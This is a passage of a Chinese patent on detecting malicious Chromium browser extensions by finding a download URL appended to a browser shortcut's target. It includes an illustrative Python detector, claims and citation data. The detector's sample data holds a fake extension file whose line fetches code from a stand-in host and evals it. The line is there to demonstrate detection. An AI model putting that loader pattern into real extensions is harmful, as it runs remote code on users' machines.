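    ("anomaly", s)                 - s is what remains besides the preset string;
    ("length_check_failed", None)  - max(A_i) > K_1, so no comparison is made
                                     (the patent does not say what follows)."""
    k1 = len(target)                     # K_1, total characters of the target string
    lengths = [len(p) for p in presets]  # A_1 ... A_z
    if max(lengths) > k1:
        return ("length_check_failed", None)
    for preset in presets:
        # Target matching interval: same length as the preset string, starting
        # at the first character of the target string.
        if target[:len(preset)] == preset:
            remainder = target[len(preset):].strip()  # strip() is an assumption
            return ("preset_only", None) if not remainder else ("anomaly", remainder)
    return ("anomaly", target)  # no preset string present at all


def locate_abnormal_extensions(anomaly_string, extensions):
    """Abnormality positioning: match the judgment string against every resource
    file (main function file and sub-function files) of every extension."""
    return sorted(name for name, files in extensions.items()
                  if any(anomaly_string in content for content in files.values()))


def analyse(target_address, extensions):
    """Whole pipeline; returns the abnormal extension names, or None when the
    target string holds only a preset string and the patent's static and dynamic
    vulnerability detection would take over instead."""
    status, anomaly = judge(target_string(target_address))
    if status != "anomaly":
        return None
    return locate_abnormal_extensions(anomaly, extensions)


# Constructed shortcut target: the browser is launched with a URL argument.
SHORTCUT_TARGET = r"C:\Program Files\Chromium\Application\chrome.exe http://dl.example.test/stage2"

# Constructed resource files of two installed extensions (assumed file layout).
EXTENSIONS = {
    "tab-saver": {
        "manifest.json": '{"name": "Tab Saver", "background": {"service_worker": "bg.js"}}',
        "bg.js": "chrome.tabs.onUpdated.addListener(() => saveTabs());",
        "util.js": "function saveTabs() { return true; }",
    },
    "free-vpn": {
        "manifest.json": '{"name": "Free VPN", "background": {"service_worker": "bg.js"}}',
        "bg.js": 'importScripts("loader.js");',
        "loader.js": 'fetch("http://dl.example.test/stage2").then(r => r.text()).then(eval);',
    },
}

if __name__ == "__main__":
    print(target_string(SHORTCUT_TARGET))
    print(judge(target_string(SHORTCUT_TARGET)))
    print(analyse(SHORTCUT_TARGET, EXTENSIONS))
```

For the constructed target the string after the last separator is `chrome.exe http://dl.example.test/stage2`, the preset string matches the leading interval, the remainder `http://dl.example.test/stage2` becomes the abnormality judgment string, and it is found in `loader.js` of the `free-vpn` extension. Two practical caveats: the preset strings must cover every legitimate trailing form of the target (including ordinary command-line switches), otherwise benign arguments are reported as abnormality judgment strings; and because the length pre-check of claim 3 compares the target string against the longest preset string, a legitimate target that is shorter than the longest preset string is never compared at all, which the patent leaves unresolved.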
Furthermore, although the steps of the methods in the present disclosure are depicted in a particular order in the drawings, this does not require or imply that the steps must be performed in that particular order or that all illustrated steps be performed in order to achieve desirable results. Additionally or alternatively, certain steps may be omitted, multiple steps combined into one step to perform, and/or one step decomposed into multiple steps to perform, etc.
From the above description of embodiments, those skilled in the art will readily appreciate that the example embodiments described herein may be implemented in software, or may be implemented in software in combination with the necessary hardware. Thus, the technical solution according to the embodiments of the present disclosure may be embodied in the form of a software product, which may be stored in a non-volatile storage medium (may be a CD-ROM, a U-disk, a mobile hard disk, etc.) or on a network, including several instructions to cause a computing device (may be a personal computer, a server, a mobile terminal, or a network device, etc.) to perform the method according to the embodiments of the present disclosure.
In an exemplary embodiment of the present disclosure, an electronic device capable of implementing the above method is also provided.
Those skilled in the art will appreciate that the various aspects of the invention may be implemented as a system, method, or program product. Accordingly, aspects of the invention may be embodied in the following forms, namely: an entirely hardware embodiment, an entirely software embodiment (including firmware, micro-code, etc.) or an embodiment combining hardware and software aspects, which may be referred to herein as a "circuit", "module" or "system".
An electronic device according to this embodiment of the invention is described below. The electronic device is merely an example, and should not impose any limitations on the functionality and scope of use of embodiments of the present invention.
The electronic device is in the form of a general purpose computing device. Components of an electronic device may include, but are not limited to: the at least one processor, the at least one memory, and a bus connecting the various system components, including the memory and the processor.
Wherein the memory stores program code that is executable by the processor to cause the processor to perform steps according to various exemplary embodiments of the present invention described in the above section of the exemplary method of this specification.
The storage may include readable media in the form of volatile storage, such as Random Access Memory (RAM) and/or cache memory, and may further include Read Only Memory (ROM).
The storage may also include a program/utility having a set (at least one) of program modules including, but not limited to: an operating system, one or more application programs, other program modules, and program data, each or some combination of which may include an implementation of a network environment.
The bus may be one or more of several types of bus structures including a memory bus or memory controller, a peripheral bus, an accelerated graphics port, a processor, or a local bus using any of a variety of bus architectures.
The electronic device may also communicate with one or more external devices (e.g., keyboard, pointing device, bluetooth device, etc.), with one or more devices that enable a user to interact with the electronic device, and/or with any device (e.g., router, modem, etc.) that enables the electronic device to communicate with one or more other computing devices. Such communication may be through an input/output (I/O) interface. And, the electronic device may also communicate with one or more networks such as a Local Area Network (LAN), a Wide Area Network (WAN), and/or a public network, such as the Internet, through a network adapter. The network adapter communicates with other modules of the electronic device via a bus. It should be appreciated that although not shown, other hardware and/or software modules may be used in connection with an electronic device, including but not limited to: microcode, device drivers, redundant processors, external disk drive arrays, RAID systems, tape drives, data backup storage systems, and the like.
In an exemplary embodiment of the present disclosure, a computer-readable storage medium having stored thereon a program product capable of implementing the method described above in the present specification is also provided. In some possible embodiments, the aspects of the invention may also be implemented in the form of a program product comprising program code for causing a terminal device to carry out the steps according to the various exemplary embodiments of the invention as described in the "exemplary method" section of this specification, when the program product is run on the terminal device.
The program product may employ any combination of one or more readable media. The readable medium may be a readable signal medium or a readable storage medium. The readable storage medium can be, for example, but is not limited to, an electronic, magnetic, optical, electromagnetic, infrared, or semiconductor system, apparatus, or device, or a combination of any of the foregoing. More specific examples (a non-exhaustive list) of the readable storage medium would include the following: an electrical connection having one or more wires, a portable disk, a hard disk, Random Access Memory (RAM), Read-Only Memory (ROM), Erasable Programmable Read-Only Memory (EPROM or flash memory), optical fiber, portable Compact Disk Read-Only Memory (CD-ROM), an optical storage device, a magnetic storage device, or any suitable combination of the foregoing.
The computer readable signal medium may include a data signal propagated in baseband or as part of a carrier wave with readable program code embodied therein. Such a propagated data signal may take any of a variety of forms, including, but not limited to, electro-magnetic, optical, or any suitable combination of the foregoing. A readable signal medium may also be any readable medium that is not a readable storage medium and that can communicate, propagate, or transport a program for use by or in connection with an instruction execution system, apparatus, or device.
Program code embodied on a readable medium may be transmitted using any appropriate medium, including but not limited to wireless, wireline, optical fiber cable, RF, etc., or any suitable combination of the foregoing.
Program code for carrying out operations of the present invention may be written in any combination of one or more programming languages, including an object oriented programming language such as Java, C++ or the like and conventional procedural programming languages, such as the "C" programming language or similar programming languages. The program code may execute entirely on the user's computing device, partly on the user's device, as a stand-alone software package, partly on the user's computing device, partly on a remote computing device, or entirely on the remote computing device or server. In the case of remote computing devices, the remote computing device may be connected to the user computing device through any kind of network, including a Local Area Network (LAN) or a Wide Area Network (WAN), or may be connected to an external computing device (e.g., connected via the Internet using an Internet service provider).
Furthermore, the above-described drawings are only schematic illustrations of processes included in the method according to the exemplary embodiment of the present invention, and are not intended to be limiting. It will be readily appreciated that the processes shown in the above figures do not indicate or limit the temporal order of these processes. In addition, it is also readily understood that these processes may be performed synchronously or asynchronously, for example, among a plurality of modules.
It should be noted that although in the above detailed description several modules or units of a device for action execution are mentioned, such a division is not mandatory. Indeed, the features and functionality of two or more modules or units described above may be embodied in one module or unit in accordance with embodiments of the present disclosure. Conversely, the features and functions of one module or unit described above may be further divided into a plurality of modules or units to be embodied.
The present invention is not limited to the above embodiments, and any changes or substitutions that can be easily understood by those skilled in the art within the technical scope of the present invention are intended to be included in the scope of the present invention. Therefore, the protection scope of the invention is subject to the protection scope of the claims.

Claims (9)

1. A browser-based anomaly detection method, characterized by comprising the following steps:
obtaining a target address linked to a shortcut file of a browser to be tested; the browser to be tested is a browser developed based on the Chromium browser, and a plurality of extension programs are installed in the browser to be tested;
acquiring a target character string, wherein the target character string is the character string after the last preset separator in the target address;
if other character strings exist in the target character string besides the preset character strings, using the other character strings as the abnormality judgment character string;
performing abnormality positioning processing on the plurality of extension programs according to the abnormality judgment character string, and determining the abnormal extension program;
the abnormality judgment character string is the character string corresponding to a resource downloading instruction;
the abnormality positioning processing comprises the following steps:
acquiring the resource file of each extension program; the resource file comprises the main function file and the sub-function files corresponding to the extension program;
matching the abnormality judgment character string with the character strings in the resource file of each extension program respectively;
if the matching succeeds, determining the extension program corresponding to the successfully matched resource file as the abnormal extension program;
if only preset character strings exist in the target character string, sequentially performing static detection and dynamic detection of security vulnerabilities on each extension program to generate a security detection result for each extension program;
determining the abnormal extension program according to the security detection result of each extension program;
after determining the abnormal extension program, the method further comprises:
running the abnormal extension program again in a sandbox, and acquiring the resource information corresponding to the resource downloading process during the run;
performing anomaly detection on the target terminal according to the resource information; the target terminal is the terminal on which the browser to be tested is installed.
2. The method of claim 1, wherein obtaining the target address linked to the browser shortcut file to be tested comprises:
decoding the shortcut file of the browser to be tested to generate a hexadecimal file code corresponding to the shortcut file;
and acquiring the target address from a preset coding region of the hexadecimal file code.
3. The method according to claim 1, wherein before taking the other character string as the abnormality determination character string if the other character string is present in the target character string in addition to the preset character string, the method further comprises:
acquiring the total number of characters $K_1$ in the target character string;
acquiring the total number of characters $A_1, A_2, \dots, A_i, \dots, A_z$ contained in each preset character string; wherein $A_i$ is the total number of characters contained in the i-th preset character string, $z$ is the total number of preset character strings, and $i = 1, 2, \dots, z$;
if $\max(A_1, A_2, \dots, A_i, \dots, A_z) \le K_1$, comparing each preset character string with the target character string.
4. A method according to claim 3, wherein comparing each of the predetermined strings with the target string comprises:
determining a target matching interval in the target character string, wherein the length of the target matching interval is the same as that of a corresponding preset character string, and the initial position of the target matching interval is the first character in the target character string;
and comparing the preset character string with the character string in the corresponding target matching interval.
5. The method of claim 1, wherein after determining the exception extension program, the method further comprises:
acquiring a plurality of acquisition terminals; each acquisition terminal is provided with an acquisition browser developed based on the Chromium browser, and each acquisition browser contains only one abnormal extension program;
acquiring the port state vector and the port behavior set acquired by each acquisition terminal; wherein $B_j$ is the port state vector acquired by the j-th acquisition terminal, $B_j = (B_j^1, B_j^2, \dots, B_j^n, \dots, B_j^y)$; $B_j^n$ is the state value of the n-th port in the j-th acquisition terminal, $y$ is the number of ports in each acquisition terminal, and $n = 1, 2, \dots, y$; wherein $C_j$ is the port behavior set acquired by the j-th acquisition terminal, $C_j = (C_j^1, C_j^2, \dots, C_j^n, \dots, C_j^y)$, $C_j^n$ is the behavior feature vector corresponding to the n-th port in the j-th acquisition terminal, $C_j^n = (C_j^{n1}, C_j^{n2}, \dots, C_j^{nm}, \dots, C_j^{nx})$; wherein $C_j^{nm}$ is the number of instructions of the m-th preset instruction type occurring in one abnormal behavior acquired at the n-th port of the j-th acquisition terminal; $x$ is the total number of preset instruction types, and $m = 1, 2, \dots, x$;
clustering all port state vectors to generate a plurality of cluster groups;
obtaining a center vector corresponding to each cluster group;
port behavior sets corresponding to all port state vectors included in each cluster group are respectively added into corresponding feature sets, and abnormal behavior feature sets corresponding to each cluster group are generated;
and generating a judgment sample set corresponding to each abnormal extension program according to the center vector and the abnormal behavior feature set corresponding to each cluster group.
6. The method of claim 5, wherein obtaining the port state vector collected by each collection terminal comprises:
acquiring a state value of each port of an acquisition terminal in one acquisition period; the acquisition period is a period corresponding to the completion of one abnormal behavior of the abnormal extension program;
If the port is in an opened state in one acquisition period, configuring a first state value for the port;
and if the port is in a closed state all the time in one acquisition period, configuring a second state value for the port.
7. A browser-based anomaly detection device, characterized in that the device comprises:
an address acquisition module, used for obtaining a target address linked to a shortcut file of a browser to be tested; the browser to be tested is a browser developed based on the Chromium browser, and a plurality of extension programs are installed in the browser to be tested;
a character acquisition module, used for obtaining a target character string, wherein the target character string is the character string after the last preset separator in the target address;
an abnormality judgment module, used for, if other character strings exist in the target character string besides the preset character strings, using the other character strings as the abnormality judgment character string;
an abnormality positioning module, used for performing abnormality positioning processing on the plurality of extension programs according to the abnormality judgment character string, and determining the abnormal extension program;
the abnormality judgment character string is the character string corresponding to a resource downloading instruction;
the abnormality positioning processing comprises the following steps:
acquiring the resource file of each extension program; the resource file comprises the main function file and the sub-function files corresponding to the extension program;
matching the abnormality judgment character string with the character strings in the resource file of each extension program respectively;
if the matching succeeds, determining the extension program corresponding to the successfully matched resource file as the abnormal extension program;
if only preset character strings exist in the target character string, sequentially performing static detection and dynamic detection of security vulnerabilities on each extension program to generate a security detection result for each extension program;
determining the abnormal extension program according to the security detection result of each extension program;
after determining the abnormal extension program, running the abnormal extension program again in a sandbox, and acquiring the resource information corresponding to the resource downloading process during the run;
performing anomaly detection on the target terminal according to the resource information; the target terminal is the terminal on which the browser to be tested is installed.
8. A non-transitory computer readable storage medium storing a computer program, wherein the computer program when executed by a processor implements a browser-based anomaly detection method according to any one of claims 1 to 6.
9. An electronic device comprising a memory, a processor and a computer program stored in the memory and executable on the processor, wherein the processor implements a browser-based anomaly detection method according to any one of claims 1 to 6 when the computer program is executed.
CN202311056058.3A 2023-08-21 2023-08-21 Anomaly detection method, system, medium and equipment based on browser Active CN117077138B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311056058.3A CN117077138B (en) 2023-08-21 2023-08-21 Anomaly detection method, system, medium and equipment based on browser

Publications (2)

Publication Number Publication Date
CN117077138A CN117077138A (en) 2023-11-17
CN117077138B true CN117077138B (en) 2024-03-08

Family

ID=88703841

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202311056058.3A Active CN117077138B (en) 2023-08-21 2023-08-21 Anomaly detection method, system, medium and equipment based on browser

Country Status (1)

Country Link
CN (1) CN117077138B (en)

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN102375951A (en) * 2011-10-18 2012-03-14 北龙中网(北京)科技有限责任公司 Webpage security detection method and system
CN114329459A (en) * 2021-11-18 2022-04-12 奇安信科技集团股份有限公司 Browser protection method and device
CN115562992A (en) * 2022-10-09 2023-01-03 北京安天网络安全技术有限公司 File detection method and device, electronic equipment and storage medium

Family Cites Families (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20070174286A1 (en) * 2005-05-17 2007-07-26 Yahoo!, Inc. Systems and methods for providing features and user interface in network browsing applications
US20180343174A1 (en) * 2012-10-09 2018-11-29 Google Inc. Rule based page processing and network request processing in browsers

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant